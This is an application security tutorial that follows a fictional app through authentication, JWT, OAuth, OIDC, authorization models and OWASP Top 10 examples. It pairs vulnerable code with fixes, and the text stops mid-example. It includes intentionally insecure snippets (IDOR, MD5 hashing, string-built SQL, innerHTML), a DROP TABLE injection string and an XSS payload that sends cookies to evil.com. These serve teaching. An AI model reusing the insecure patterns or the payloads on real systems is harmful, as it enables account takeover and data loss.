Application Security Refresher
Scenario-driven security — OAuth, JWT, OWASP Top 10, threat modeling, and the patterns that keep production systems safe. Follow "TaskFlow" from first deploy to production hardening.
1. Your App Just Went Live
You deployed TaskFlow — a SaaS task management app. Users can sign up, create projects, invite teammates, and manage tasks. The app works. You're proud. Then a colleague asks: "Is it secure?" You realize you don't have a great answer.
Security isn't one thing. It's the combination of many small decisions made correctly. The goal of this refresher is to make those decisions feel concrete rather than abstract — and to give you the vocabulary and patterns to reason about them clearly.
The Attacker's Mindset
An attacker looks at your app differently than you do. You built it to do something. They're looking for ways to make it do things it wasn't supposed to. The most useful mental shift: think about what your system trusts, and whether that trust is earned.
- Does your API trust the `user_id` in a request body? An attacker will change it.
- Does your app trust that file uploads are images? An attacker will upload PHP scripts.
- Does your login page trust that requests come from humans? An attacker will use a bot.
CIA Triad — Made Concrete
Security goals are often described as the CIA triad. Here's what each means for TaskFlow:
| Property | What it means | TaskFlow example |
|---|---|---|
| Confidentiality | Data is only readable by authorized parties | User A cannot read User B's tasks or API keys |
| Integrity | Data is only modifiable by authorized parties | User A cannot mark User B's tasks complete |
| Availability | The system is usable when legitimate users need it | An attacker cannot take the API down with a flood of requests |
Defense in Depth
Security depends on multiple overlapping layers rather than a single wall. If one layer fails, others compensate. For TaskFlow:
- Network layer: Cloudflare WAF, DDoS protection, TLS everywhere
- Application layer: Input validation, authentication, authorization checks
- Data layer: Encryption at rest, least-privilege DB users, no raw PII in logs
- Infrastructure layer: Secrets in vault, locked-down containers, dependency scanning
- Process layer: Security reviews, incident response plan, audit logging
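The layering idea can be sketched as a chain of independent checks, where any one layer rejects a request before it reaches the handler. This is a minimal illustration with hypothetical check names — a real stack would put these in a WAF, auth middleware, and so on:

```python
# Hypothetical layered checks — any one of them can reject the request
# before it reaches the handler, so a bug in a single layer isn't fatal.
def waf_check(req):    # network layer: crude payload screen
    return "drop table" not in req.get("body", "").lower()

def authn_check(req):  # application layer: is anyone logged in?
    return req.get("user_id") is not None

def authz_check(req):  # application layer: is it *their* resource?
    return req.get("user_id") == req.get("resource_owner")

LAYERS = [waf_check, authn_check, authz_check]

def handle(req) -> str:
    for layer in LAYERS:
        if not layer(req):
            return f"rejected by {layer.__name__}"
    return "ok"

print(handle({"body": "hi", "user_id": 1, "resource_owner": 1}))  # ok
print(handle({"body": "hi", "user_id": 1, "resource_owner": 2}))  # rejected by authz_check
```

The point isn't any single check — it's that removing one layer still leaves the others standing.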
Attack Surface Inventory
Before you can secure something, you need to know what exists. For TaskFlow, the attack surface includes:
- Public endpoints: login, signup, password reset, OAuth callbacks
- Authenticated endpoints: CRUD operations, file uploads, webhooks
- Admin endpoints: user management, billing, data export
- Third-party integrations: Google Calendar, Slack, payment processor
- Infrastructure: CI/CD pipelines, deployment scripts, secrets
Each surface is a potential entry point. The question isn't "can attackers find these?" — they will. The question is "have we secured each one correctly?"
2. Authentication — "Who Are You?"
A user hits TaskFlow's login page. Under the hood, your team is debating: should we use server-side sessions or JWTs? This isn't just a technical preference — it's an architectural decision with real trade-offs.
Session-Based Authentication
The server stores session state. The client carries only a session ID (in a cookie).
# Flask session-based auth
from flask import Flask, request, jsonify
import redis
import secrets
import os
import json
app = Flask(__name__)
app.secret_key = os.environ["SECRET_KEY"] # Never hardcode!
r = redis.Redis(host="localhost", port=6379)
@app.route("/login", methods=["POST"])
def login():
data = request.get_json()
user = db.users.find_by_email(data["email"])
if not user or not verify_password(data["password"], user.password_hash):
return jsonify({"error": "Invalid credentials"}), 401
    # Prevent session fixation: invalidate any session ID the client arrived with
    old_session_id = request.cookies.get("sid")
    if old_session_id:
        r.delete(f"session:{old_session_id}")
# Generate cryptographically secure session ID
session_id = secrets.token_urlsafe(32)
# Store session in Redis with TTL
r.setex(
f"session:{session_id}",
3600, # 1 hour TTL
json.dumps({"user_id": user.id, "email": user.email})
)
resp = jsonify({"ok": True})
resp.set_cookie(
"sid",
session_id,
httponly=True, # Not accessible to JavaScript
secure=True, # HTTPS only
samesite="Lax", # CSRF protection
max_age=3600
)
return resp
@app.route("/tasks")
def get_tasks():
session_id = request.cookies.get("sid")
if not session_id:
return jsonify({"error": "Unauthenticated"}), 401
session_data = r.get(f"session:{session_id}")
if not session_data:
return jsonify({"error": "Session expired"}), 401
user = json.loads(session_data)
tasks = db.tasks.find_by_user(user["user_id"])
return jsonify(tasks)
Token-Based Authentication (JWTs)
The server issues a signed token. The client carries the full identity. No server-side state required.
// Go JWT middleware
package middleware
import (
"context"
"fmt"
"net/http"
"strings"
"github.com/golang-jwt/jwt/v5"
)
type contextKey string
const UserIDKey contextKey = "user_id"
func JWTAuth(secretKey []byte) func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
authHeader := r.Header.Get("Authorization")
if !strings.HasPrefix(authHeader, "Bearer ") {
http.Error(w, `{"error":"missing token"}`, http.StatusUnauthorized)
return
}
tokenStr := strings.TrimPrefix(authHeader, "Bearer ")
token, err := jwt.Parse(tokenStr, func(t *jwt.Token) (interface{}, error) {
// Enforce algorithm: reject tokens signed with unexpected alg
if _, ok := t.Method.(*jwt.SigningMethodHMAC); !ok {
return nil, fmt.Errorf("unexpected signing method: %v", t.Header["alg"])
}
return secretKey, nil
},
jwt.WithValidMethods([]string{"HS256"}),
jwt.WithAudience("taskflow-api"),
jwt.WithExpirationRequired(),
)
if err != nil || !token.Valid {
http.Error(w, `{"error":"invalid token"}`, http.StatusUnauthorized)
return
}
claims, ok := token.Claims.(jwt.MapClaims)
if !ok {
http.Error(w, `{"error":"invalid claims"}`, http.StatusUnauthorized)
return
}
userID, ok := claims["sub"].(string)
if !ok {
http.Error(w, `{"error":"missing sub claim"}`, http.StatusUnauthorized)
return
}
ctx := context.WithValue(r.Context(), UserIDKey, userID)
next.ServeHTTP(w, r.WithContext(ctx))
})
}
}
Sessions vs Tokens — When to Use Each
| Concern | Sessions | JWTs |
|---|---|---|
| State storage | Server-side (Redis) | Client-side (token) |
| Revocation | Instant (delete from Redis) | Hard (token valid until expiry) |
| Scalability | Shared store needed | Stateless, easy to scale |
| Payload size | Tiny cookie | Larger token (claims) |
| Best for | Traditional web apps | APIs, mobile, microservices |
3. JWT Deep Dive — "You're Using JWTs Wrong"
TaskFlow chose JWTs. The implementation works — until a security researcher reports that they can log in as any user. The bug: the team forgot to validate the algorithm. This is one of several JWT mistakes that are easy to make and catastrophic in production.
Structure: Three Base64URL-Encoded Parts
// A JWT looks like:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ1c2VyXzQyIiwic2NvcGUiOiJ0YXNrczpyZWFkIHRhc2tzOndyaXRlIiwiZXhwIjoxNzQyMDAwMDAwLCJpYXQiOjE3NDE5OTY0MDB9.abc123signature
// Decoded header:
{
"alg": "HS256", // Signing algorithm
"typ": "JWT"
}
// Decoded payload (READABLE BY ANYONE — not encrypted!):
{
"sub": "user_42", // Subject: who this token is for
"scope": "tasks:read tasks:write", // What they can do
"exp": 1742000000, // Expiry timestamp (Unix)
"iat": 1741996400, // Issued-at timestamp
"iss": "https://taskflow.app" // Issuer
}
// Signature: HMACSHA256(base64url(header) + "." + base64url(payload), secret)
// Verifying: recalculate signature, check it matches — proves payload was not tampered
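The sign-then-verify round trip described above can be made concrete with a stdlib-only sketch (illustrative helper names — real code should use a vetted library like PyJWT, not hand-rolled crypto):

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # JWTs use base64url encoding without padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def verify_hs256(token: str, secret: bytes) -> bool:
    signing_input, _, sig_b64 = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    # Constant-time comparison avoids leaking how many bytes matched
    return hmac.compare_digest(b64url(expected), sig_b64)

secret = b"use-a-real-256-bit-random-secret"
token = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "user_42"}, secret)

# Tamper with the payload but keep the old signature
head, _payload, sig = token.split(".")
forged = head + "." + b64url(b'{"sub":"admin"}') + "." + sig

print(verify_hs256(token, secret))   # True
print(verify_hs256(forged, secret))  # False — payload changed, signature didn't
```

This is why "readable by anyone" and "tamper-proof" coexist: the payload is plain base64url, but changing a single byte of it invalidates the signature.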
- alg:none attack — An attacker sets `"alg": "none"` and strips the signature. A naive library accepts it. Always verify the algorithm matches what you expect.
- Symmetric secret brute-force — HS256 with a weak secret can be cracked offline. Use at least 256 bits of entropy, or switch to RS256.
- Sensitive data in payload — The payload is base64url encoded, not encrypted. Anyone who gets the token can read its contents. Never store passwords, SSNs, or PII in JWT claims.
- Token size bloat — Cramming all permissions into a JWT makes it huge. Every authenticated request sends this payload. Keep tokens lean; fetch permissions server-side for complex authz.
- Missing expiry — A JWT without `exp` is valid forever. Always set expiry.
Signing Algorithms Compared
| Algorithm | Type | Key requirement | Use when |
|---|---|---|---|
| HS256 | Symmetric (HMAC) | Shared secret | Single service; same party signs and verifies |
| RS256 | Asymmetric (RSA) | Private key signs, public key verifies | Auth server issues tokens; resource servers verify without the secret |
| ES256 | Asymmetric (ECDSA) | EC private/public key pair | Same as RS256 but smaller tokens; preferred for mobile |
Signing and Verifying — The Right Way
import jwt
import os
from datetime import datetime, timezone, timedelta
SECRET_KEY = os.environ["JWT_SECRET"] # Min 32 bytes, random
def create_access_token(user_id: str, scopes: list[str]) -> str:
now = datetime.now(timezone.utc)
payload = {
"sub": user_id,
"scope": " ".join(scopes),
"iss": "https://taskflow.app",
"iat": now,
"exp": now + timedelta(minutes=15), # Short-lived access token
}
return jwt.encode(payload, SECRET_KEY, algorithm="HS256")
def verify_access_token(token: str) -> dict:
try:
payload = jwt.decode(
token,
SECRET_KEY,
algorithms=["HS256"], # Explicit allowlist — rejects "none"
options={"require": ["exp", "sub", "iss"]},
issuer="https://taskflow.app",
)
return payload
except jwt.ExpiredSignatureError:
raise AuthError("Token expired")
except jwt.InvalidTokenError as e:
raise AuthError(f"Invalid token: {e}")
Refresh Token Rotation
Access tokens should be short-lived (15 minutes). Refresh tokens are longer-lived but must be rotated on every use to detect theft.
import hashlib
import secrets
from dataclasses import dataclass
from datetime import datetime, timezone, timedelta
@dataclass
class TokenPair:
access_token: str
refresh_token: str
def issue_token_pair(user_id: str, family: str | None = None) -> TokenPair:
    access = create_access_token(user_id, ["tasks:read", "tasks:write"])
    refresh = secrets.token_urlsafe(64)  # High entropy, opaque string
    # Store refresh token hash in DB (never store raw token)
    token_hash = hashlib.sha256(refresh.encode()).hexdigest()
    db.refresh_tokens.insert({
        "user_id": user_id,
        "token_hash": token_hash,
        "expires_at": datetime.now(timezone.utc) + timedelta(days=30),
        # The family persists across rotations so reuse detection can
        # revoke every descendant token at once
        "family": family or secrets.token_urlsafe(16),
        "used": False,
    })
    return TokenPair(access_token=access, refresh_token=refresh)

def rotate_refresh_token(old_refresh: str) -> TokenPair:
    token_hash = hashlib.sha256(old_refresh.encode()).hexdigest()
    record = db.refresh_tokens.find_by_hash(token_hash)
    if not record:
        raise AuthError("Invalid refresh token")
    if record.used:
        # Token reuse — indicates theft. Revoke entire family.
        db.refresh_tokens.revoke_family(record.family)
        raise AuthError("Refresh token reuse detected — all sessions revoked")
    # Mark old token as used
    db.refresh_tokens.mark_used(record.id)
    # Issue new pair in the same family
    return issue_token_pair(record.user_id, family=record.family)
4. OAuth 2.0 — "Let Users Log In With Google"
TaskFlow wants to add Google Calendar integration — users can attach due dates to Google Calendar events. Users ask: "Do I have to give you my Google password?" The answer should be no. That's what OAuth solves.
The Real Problem OAuth Solves
Before OAuth, the only way to let TaskFlow access your Google Calendar was to give TaskFlow your Google password. TaskFlow would store it, use it to log in on your behalf. This was terrible: TaskFlow could access everything in your account, you couldn't revoke access without changing your password, and if TaskFlow was breached, your Google account was compromised.
OAuth introduces a delegated authorization model: you grant TaskFlow limited access to specific Google resources, without sharing your password. You can revoke that access at any time without affecting your Google account.
Four Roles
- Resource Owner — You. The person who owns the Google Calendar data.
- Client — TaskFlow. The app that wants access to your data.
- Authorization Server — Google's OAuth server. Issues tokens after you consent.
- Resource Server — Google Calendar API. Accepts access tokens to serve your data.
Authorization Code Flow — Step by Step
import base64
import hashlib
import json
import os
import secrets
from datetime import datetime, timezone, timedelta
from urllib.parse import urlencode
import httpx
GOOGLE_CLIENT_ID = os.environ["GOOGLE_CLIENT_ID"]
GOOGLE_CLIENT_SECRET = os.environ["GOOGLE_CLIENT_SECRET"]
GOOGLE_AUTH_URL = "https://accounts.google.com/o/oauth2/v2/auth"
GOOGLE_TOKEN_URL = "https://oauth2.googleapis.com/token"
def start_oauth_flow(user_id: str) -> str:
"""Generate authorization URL with PKCE and state."""
# PKCE: code verifier is random, code challenge is its SHA256 hash
code_verifier = secrets.token_urlsafe(64)
code_challenge = base64.urlsafe_b64encode(
hashlib.sha256(code_verifier.encode()).digest()
).rstrip(b"=").decode()
# State: opaque value to prevent CSRF on callback
state = secrets.token_urlsafe(32)
# Store verifier and state — tied to this user's in-progress flow
redis.setex(f"oauth_state:{state}", 600, json.dumps({
"user_id": user_id,
"code_verifier": code_verifier,
}))
params = {
"client_id": GOOGLE_CLIENT_ID,
"redirect_uri": "https://taskflow.app/oauth/callback",
"response_type": "code",
"scope": "openid email https://www.googleapis.com/auth/calendar.readonly",
"state": state,
"code_challenge": code_challenge,
"code_challenge_method": "S256",
"access_type": "offline", # Request refresh token
"prompt": "consent",
}
return GOOGLE_AUTH_URL + "?" + urlencode(params)
def handle_oauth_callback(code: str, state: str) -> dict:
"""Exchange authorization code for tokens."""
# Validate state — prevents CSRF
stored = redis.get(f"oauth_state:{state}")
if not stored:
raise AuthError("Invalid or expired OAuth state")
redis.delete(f"oauth_state:{state}") # One-time use
flow_data = json.loads(stored)
# Exchange code for tokens (server-to-server — client secret stays on server)
response = httpx.post(GOOGLE_TOKEN_URL, data={
"code": code,
"client_id": GOOGLE_CLIENT_ID,
"client_secret": GOOGLE_CLIENT_SECRET,
"redirect_uri": "https://taskflow.app/oauth/callback",
"grant_type": "authorization_code",
"code_verifier": flow_data["code_verifier"], # PKCE verification
})
response.raise_for_status()
tokens = response.json()
# Store tokens encrypted in DB for this user
db.oauth_tokens.upsert({
"user_id": flow_data["user_id"],
"provider": "google",
"access_token": encrypt(tokens["access_token"]),
"refresh_token": encrypt(tokens.get("refresh_token")),
"expires_at": datetime.now(timezone.utc) + timedelta(seconds=tokens["expires_in"]),
})
return {"ok": True}
PKCE — Why SPAs and Mobile Apps Can't Use client_secret
A client_secret is only secret if it stays on a server. A React SPA or iOS app ships the secret to every user's device — anyone can extract it from the bundle. PKCE (Proof Key for Code Exchange) replaces the secret with a one-time cryptographic proof:
- Client generates a random `code_verifier` (kept in memory)
- Client sends `SHA256(code_verifier)` as `code_challenge` in the auth request
- On callback, client sends the original `code_verifier`
- Auth server verifies: `SHA256(code_verifier) == code_challenge`
Even if an attacker intercepts the authorization code, they can't exchange it without the code_verifier that never left the client's memory.
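Those steps are just hashing and comparison. A stdlib sketch of the verifier/challenge math (hypothetical function names; the real exchange happens over the authorization and token endpoints shown earlier):

```python
import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple[str, str]:
    # Verifier: 43-128 chars of URL-safe randomness (RFC 7636)
    verifier = secrets.token_urlsafe(64)
    challenge = base64.urlsafe_b64encode(
        hashlib.sha256(verifier.encode("ascii")).digest()
    ).rstrip(b"=").decode()
    return verifier, challenge

def server_verifies(challenge: str, presented_verifier: str) -> bool:
    # The auth server recomputes the challenge from the presented verifier
    recomputed = base64.urlsafe_b64encode(
        hashlib.sha256(presented_verifier.encode("ascii")).digest()
    ).rstrip(b"=").decode()
    return secrets.compare_digest(recomputed, challenge)

verifier, challenge = make_pkce_pair()
print(server_verifies(challenge, verifier))        # True — legitimate client
print(server_verifies(challenge, "stolen-guess"))  # False — code alone is useless
```

The hash is one-way: knowing the `code_challenge` from the auth request doesn't let an attacker recover the `code_verifier` they'd need at the token endpoint.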
Client Credentials — Machine-to-Machine
# TaskFlow's backend calling an internal analytics service
# No user involved — service authenticates directly
def get_machine_access_token() -> str:
response = httpx.post(TOKEN_URL, data={
"grant_type": "client_credentials",
"client_id": os.environ["ANALYTICS_CLIENT_ID"],
"client_secret": os.environ["ANALYTICS_CLIENT_SECRET"],
"scope": "analytics:read",
})
response.raise_for_status()
return response.json()["access_token"]
5. OpenID Connect — "One-Click Sign-In"
TaskFlow implements "Sign in with Google." OAuth handles authorization, but how does TaskFlow know who just logged in? That's what OpenID Connect adds on top of OAuth.
OAuth answers: "Is this user allowed to access this resource?" It doesn't answer: "Who is this user?" OpenID Connect (OIDC) extends OAuth with an identity layer: alongside the access token, the authorization server returns an ID token — a JWT containing the user's identity.
What OIDC Adds
- ID Token — A signed JWT with standard user identity claims
- UserInfo endpoint — `GET /userinfo` returns user claims when called with an access token
- Discovery document — `/.well-known/openid-configuration` describes the provider's endpoints and capabilities
- Standard scopes — `openid` (required), `profile`, `email`, `address`, `phone`
Standard Claims in an ID Token
{
"iss": "https://accounts.google.com",
"sub": "1234567890", // Unique user identifier at this provider
"aud": "taskflow-client-id", // Must match your client_id
"exp": 1742000000,
"iat": 1741996400,
"email": "[email protected]",
"email_verified": true,
"name": "Alice Smith",
"picture": "https://lh3.googleusercontent.com/...",
"given_name": "Alice",
"family_name": "Smith",
"locale": "en"
}
import jwt
import httpx
def handle_google_signin(id_token: str, access_token: str) -> dict:
"""Verify ID token and extract user identity."""
# Production: cache JWKS with TTL (e.g., 1 hour) and refresh on unknown kid.
# The httpx calls below should use timeout=5.0 and retry logic.
# Fetch Google's public keys from discovery document
discovery = httpx.get(
"https://accounts.google.com/.well-known/openid-configuration",
timeout=5.0,
).json()
jwks_uri = discovery["jwks_uri"]
jwks = httpx.get(jwks_uri, timeout=5.0).json()
# Verify the ID token signature and claims
try:
payload = jwt.decode(
id_token,
jwt.algorithms.RSAAlgorithm.from_jwk(get_matching_key(jwks, id_token)),
algorithms=["RS256"],
audience=GOOGLE_CLIENT_ID,
issuer="https://accounts.google.com",
)
except jwt.InvalidTokenError as e:
raise AuthError(f"Invalid ID token: {e}")
# At this point we know: Google vouches this user authenticated
# sub is their stable Google identifier (use this as the foreign key, not email)
user = db.users.find_or_create_by_provider(
provider="google",
provider_user_id=payload["sub"],
defaults={
"email": payload.get("email"),
"name": payload.get("name"),
"avatar_url": payload.get("picture"),
}
)
return issue_token_pair(user.id)
def get_matching_key(jwks: dict, token: str):
"""Find the public key matching the token's kid header."""
header = jwt.get_unverified_header(token)
for key in jwks["keys"]:
if key["kid"] == header["kid"]:
return key
raise AuthError("No matching key found in JWKS")
The `sub` claim is a stable, immutable identifier at the provider. Store provider + `sub` as your identity linkage — emails can change. Use email only for display and communication.
6. Passwordless & Magic Links
TaskFlow's support team is drowning in "forgot my password" tickets. The team considers dropping passwords entirely. Magic links — clicking an emailed link to log in — are simpler for users and, implemented correctly, more secure than weak passwords.
Magic Link Flow
import secrets
import hashlib
from datetime import datetime, timezone, timedelta
def request_magic_link(email: str) -> None:
"""Generate and send a magic link. Always returns 200 to prevent email enumeration."""
user = db.users.find_by_email(email)
if not user:
# Don't reveal whether the email exists
# Optionally: auto-create account on first magic link click
return
# Generate token — high entropy opaque string
token = secrets.token_urlsafe(32)
token_hash = hashlib.sha256(token.encode()).hexdigest()
# Store the hash (never the raw token)
db.magic_link_tokens.insert({
"user_id": user.id,
"token_hash": token_hash,
"expires_at": datetime.now(timezone.utc) + timedelta(minutes=15),
"used": False,
"created_ip": request.remote_addr,
})
magic_url = f"https://taskflow.app/auth/magic?token={token}"
send_email(
to=email,
subject="Your TaskFlow login link",
body=f"Click to log in (expires in 15 minutes):\n\n{magic_url}\n\nIf you didn't request this, ignore this email.",
)
def verify_magic_link(token: str) -> TokenPair:
"""Validate token, issue session."""
token_hash = hashlib.sha256(token.encode()).hexdigest()
record = db.magic_link_tokens.find_by_hash(token_hash)
if not record:
raise AuthError("Invalid or expired magic link")
if record.used:
raise AuthError("This magic link has already been used")
if record.expires_at < datetime.now(timezone.utc):
raise AuthError("Magic link has expired")
# Mark as used — single use!
db.magic_link_tokens.update(record.id, {"used": True})
return issue_token_pair(record.user_id)
Security Properties of Magic Links
- Single-use: Each token is invalidated after first use. Replaying it fails.
- Short TTL: 15-minute window limits exposure if email is compromised.
- Email as second factor: Attacker needs access to the email inbox, not just a password.
- No password to steal: The most common credential breach vector is eliminated.
- Store hash, not token: DB breach doesn't expose valid tokens.
WebAuthn / Passkeys — The Future
Passkeys replace passwords with public-key cryptography. The private key never leaves the device. Authentication requires both the device (possession) and biometrics or PIN (knowledge/inherence). The browser handles the crypto via the WebAuthn API.
// WebAuthn registration (simplified)
async function registerPasskey(userId, username) {
const challenge = await fetchChallengeFromServer(); // Random bytes from server
const credential = await navigator.credentials.create({
publicKey: {
challenge: Uint8Array.from(atob(challenge), c => c.charCodeAt(0)),
rp: { name: "TaskFlow", id: "taskflow.app" },
user: {
id: Uint8Array.from(userId, c => c.charCodeAt(0)),
name: username,
displayName: username,
},
pubKeyCredParams: [
{ alg: -7, type: "public-key" }, // ES256
{ alg: -257, type: "public-key" }, // RS256
],
authenticatorSelection: {
residentKey: "required", // Passkey (stored on device)
userVerification: "required",
},
},
});
// Send credential.response to server to store public key
await saveCredentialToServer(credential);
}
// WebAuthn authentication
async function authenticateWithPasskey() {
const challenge = await fetchChallengeFromServer();
const assertion = await navigator.credentials.get({
publicKey: {
challenge: Uint8Array.from(atob(challenge), c => c.charCodeAt(0)),
rpId: "taskflow.app",
userVerification: "required",
},
});
// Server verifies the assertion signature using stored public key
return await verifyAssertionOnServer(assertion);
}
7. Authorization Patterns — Who Can Do What?
Authentication is solved. Now: Alice is an admin of the "Engineering" workspace but a regular member of "Marketing." Bob is a guest in "Engineering" — he can view tasks but not delete them. The intern can only see their own tasks. This is authorization: what authenticated users are allowed to do.
RBAC — Role-Based Access Control
Users are assigned roles. Roles have permissions. This works well when permission sets are stable and role count is small.
from enum import Enum
from functools import wraps
class Role(str, Enum):
OWNER = "owner"
ADMIN = "admin"
MEMBER = "member"
GUEST = "guest"
# Permission matrix
PERMISSIONS = {
Role.OWNER: {"tasks:create", "tasks:read", "tasks:update", "tasks:delete", "workspace:manage", "members:manage"},
Role.ADMIN: {"tasks:create", "tasks:read", "tasks:update", "tasks:delete", "members:manage"},
Role.MEMBER: {"tasks:create", "tasks:read", "tasks:update"},
Role.GUEST: {"tasks:read"},
}
def require_permission(permission: str):
"""Decorator that checks if the current user has the required permission."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
user_id = get_current_user_id()
workspace_id = kwargs.get("workspace_id") or request.view_args.get("workspace_id")
membership = db.memberships.find(user_id=user_id, workspace_id=workspace_id)
if not membership:
return jsonify({"error": "Not a member"}), 403
allowed = PERMISSIONS.get(membership.role, set())
if permission not in allowed:
return jsonify({"error": "Insufficient permissions"}), 403
return f(*args, **kwargs)
return wrapper
return decorator
@app.route("/workspaces/<workspace_id>/tasks/<task_id>", methods=["DELETE"])
@require_permission("tasks:delete")
def delete_task(workspace_id, task_id):
task = db.tasks.find(id=task_id, workspace_id=workspace_id)
if not task:
return jsonify({"error": "Not found"}), 404
db.tasks.delete(task_id)
return jsonify({"ok": True})
ABAC — Attribute-Based Access Control
When RBAC gets too complex (conditional permissions, time-based access, contextual rules), ABAC evaluates policies against attributes of the subject, resource, and environment.
# ABAC: can the user edit this task?
def can_edit_task(user: User, task: Task, context: dict) -> bool:
"""
Rules:
- Owners/admins can always edit
- Members can edit if they're the assignee or creator
- Guests can never edit
- No one can edit completed tasks after 24 hours
- No editing during scheduled maintenance window
"""
if user.workspace_role in (Role.OWNER, Role.ADMIN):
return True
if user.workspace_role == Role.GUEST:
return False
if task.status == "completed":
age = datetime.now(timezone.utc) - task.completed_at
if age > timedelta(hours=24):
return False
if context.get("maintenance_mode"):
return False
# Member: can edit their own tasks
return task.creator_id == user.id or task.assignee_id == user.id
ReBAC — Relationship-Based Access Control
Google Zanzibar (and its open-source implementations like SpiceDB and OpenFGA) express access control as a graph of relationships. This scales to complex hierarchies.
# SpiceDB schema: TaskFlow authorization model
definition workspace {
relation owner: user
relation admin: user
relation member: user
relation guest: user
permission manage = owner + admin
permission write = owner + admin + member
permission read = owner + admin + member + guest
}
definition task {
relation workspace: workspace
relation creator: user
relation assignee: user
permission delete = workspace->manage + creator
permission edit = workspace->write + assignee
permission view = workspace->read
}
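To make the arrow syntax concrete, here's a toy in-memory evaluation of the `task` permissions above. This illustrates the relationship-graph idea only — it is not SpiceDB's or OpenFGA's actual API, and the tuples are invented:

```python
# Relationship tuples: (object, relation, subject)
TUPLES = {
    ("workspace:eng", "admin", "user:alice"),
    ("workspace:eng", "guest", "user:bob"),
    ("task:123", "workspace", "workspace:eng"),
    ("task:123", "creator", "user:carol"),
}

def has(obj: str, rel: str, subject: str) -> bool:
    return (obj, rel, subject) in TUPLES

def workspace_of(task: str) -> str:
    # Follow the task -> workspace relation (the "workspace->" arrow)
    return next(s for (o, r, s) in TUPLES if o == task and r == "workspace")

def can_delete(task: str, user: str) -> bool:
    # permission delete = workspace->manage + creator
    ws = workspace_of(task)
    manage = has(ws, "owner", user) or has(ws, "admin", user)
    return manage or has(task, "creator", user)

print(can_delete("task:123", "user:alice"))  # True — admin of the workspace
print(can_delete("task:123", "user:carol"))  # True — creator of the task
print(can_delete("task:123", "user:bob"))    # False — guest
```

Real ReBAC engines answer exactly this kind of "is there a path from user to permission?" query, but over millions of tuples with caching and consistency guarantees.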
Never rely on the UI to enforce authorization. Hiding the delete button stops no one — an attacker can call `DELETE /tasks/123` directly; they don't need the button. Authorization must be enforced server-side on every request, every time. The frontend is just the view layer.
The Confused Deputy Problem
A "confused deputy" is when a privileged service is tricked into taking actions on behalf of an unauthorized user. Classic example:
# VULNERABLE: endpoint trusts caller-supplied task_id
@app.route("/tasks/<task_id>/complete", methods=["POST"])
@require_auth
def complete_task(task_id):
# Fetches task_id from URL — but does NOT verify this user owns the task!
db.tasks.update(task_id, {"status": "completed"}) # Any task, any user!
return jsonify({"ok": True})
# FIXED: verify membership, then scope the query to that workspace
@app.route("/workspaces/<workspace_id>/tasks/<task_id>/complete", methods=["POST"])
@require_auth
def complete_task(workspace_id, task_id):
    user_id = get_current_user_id()
    # The workspace_id in the URL is attacker-controlled too — check membership first
    if not db.memberships.find(user_id=user_id, workspace_id=workspace_id):
        return jsonify({"error": "Task not found"}), 404
    task = db.tasks.find(id=task_id, workspace_id=workspace_id)
    if not task:
        return jsonify({"error": "Task not found"}), 404  # Same error for not-found and unauthorized
    db.tasks.update(task_id, {"status": "completed"})
    return jsonify({"ok": True})
8. OWASP Top 10 in Context
The OWASP Top 10 is a consensus list of the most critical web application security risks, updated every few years based on real breach data. Here's each one as it would manifest in TaskFlow — with vulnerable code and the fix.
A01 — Broken Access Control
The #1 risk. Users can act outside their intended permissions. The classic variant: changing an ID in a URL to access someone else's data (IDOR — Insecure Direct Object Reference).
# VULNERABLE: attacker changes task_id=456 to task_id=789
@app.route("/tasks/<int:task_id>")
@require_auth
def get_task(task_id):
task = db.query("SELECT * FROM tasks WHERE id = %s", task_id)
return jsonify(task) # Returns any task, regardless of who owns it!
# FIXED: always filter by the authenticated user's context
@app.route("/tasks/<int:task_id>")
@require_auth
def get_task(task_id):
user_id = get_current_user_id()
# Only returns tasks in workspaces where user is a member
task = db.query("""
SELECT t.* FROM tasks t
JOIN workspace_members wm ON wm.workspace_id = t.workspace_id
WHERE t.id = %s AND wm.user_id = %s
""", task_id, user_id)
if not task:
return jsonify({"error": "Not found"}), 404 # Same error for both cases
return jsonify(task)
A02 — Cryptographic Failures
Data exposed in transit or at rest. Passwords stored with weak or no hashing. Sensitive data returned unnecessarily in API responses.
# VULNERABLE: MD5 for passwords (cracked in seconds with rainbow tables)
import hashlib
def store_password_bad(password):
return hashlib.md5(password.encode()).hexdigest() # NEVER do this
# ALSO VULNERABLE: returning sensitive fields in API responses
def user_to_dict_bad(user):
return {
"id": user.id,
"email": user.email,
"password_hash": user.password_hash, # Never expose this!
"api_key": user.api_key, # Never expose this!
}
# FIXED: bcrypt with appropriate work factor
import bcrypt
def store_password(password: str) -> str:
salt = bcrypt.gensalt(rounds=12) # Work factor: tune so hashing takes ~100ms
return bcrypt.hashpw(password.encode(), salt).decode()
def verify_password(password: str, stored_hash: str) -> bool:
return bcrypt.checkpw(password.encode(), stored_hash.encode())
# FIXED: explicit response schema — only include what's needed
def user_to_public_dict(user):
return {
"id": user.id,
"email": user.email,
"name": user.name,
"avatar_url": user.avatar_url,
# No password_hash, no api_key, no internal fields
}
A03 — Injection
SQL injection and XSS are the classic injection flaws. Both stem from the same root cause: mixing untrusted data with code or markup without proper escaping.
# VULNERABLE: SQL injection
def search_tasks_bad(query: str):
# If query = "'; DROP TABLE tasks; --"
sql = f"SELECT * FROM tasks WHERE title LIKE '%{query}%'"
return db.execute(sql) # Catastrophic!
# FIXED: parameterized queries
def search_tasks(query: str):
return db.execute(
"SELECT * FROM tasks WHERE title ILIKE %s",
(f"%{query}%",) # Parameter, never interpolated into SQL string
)
// VULNERABLE: XSS via innerHTML
function renderTaskBad(task) {
// If task.title is: <script>document.location='https://evil.com?c='+document.cookie</script>
document.getElementById('container').innerHTML = `<div>${task.title}</div>`;
}
// FIXED: textContent treats content as text, never HTML
function renderTask(task) {
